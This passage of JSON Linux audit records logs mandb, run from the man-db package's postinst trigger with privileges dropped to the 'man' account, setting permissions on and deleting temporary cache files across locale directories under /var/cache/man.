"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:778",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f912da0",
"0x1a4",
"0x55cf8f8a76d0",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/ko"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/ru/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:779",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f912da0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/ru"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/ru/",
"inode": 266954,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/ru/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:780",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9413d0",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/ru"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/id/CACHEDIR.TAG",
"inode": 276965,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:781",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f912da0",
"0x1a4",
"0x55cf8f9b9560",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/ru"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/id/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:782",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f912da0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/id"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/id/",
"inode": 266946,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/id/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:783",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f912ce0",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/id"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/pt_BR/CACHEDIR.TAG",
"inode": 276966,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:784",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f963910",
"0x1a4",
"0x55cf8f8a76d0",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/id"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/pt_BR/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:785",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f963910",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/pt_BR"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/pt_BR/",
"inode": 266953,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/pt_BR/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:786",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f980cc0",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/pt_BR"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/fr/CACHEDIR.TAG",
"inode": 276967,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:787",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9126b0",
"0x1a4",
"0x55cf8f9b9560",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/pt_BR"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/fr/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:788",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9126b0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/fr"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/fr/",
"inode": 266944,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/fr/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:789",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f980cf0",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/fr"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/pt/CACHEDIR.TAG",
"inode": 276968,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.437:790",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9126b0",
"0x1a4",
"0x55cf8f8a76d0",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/fr"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/pt/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.437:791",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9126b0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/pt"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/pt/",
"inode": 266952,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/pt/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.437:792",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f99cfc0",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/pt"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/sr/CACHEDIR.TAG",
"inode": 276969,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.437:793",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9126b0",
"0x1a4",
"0x55cf8f9b9560",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/pt"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/sr/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.437:794",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9126b0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/sr"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/sr/",
"inode": 266956,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/sr/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.437:795",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f99cff0",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/sr"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/ja/CACHEDIR.TAG",
"inode": 276970,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.437:796",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9126b0",
"0x1a4",
"0x55cf8f8a76d0",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/sr"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/ja/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.437:797",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9126b0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/ja"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/ja/",
"inode": 266948,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/ja/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
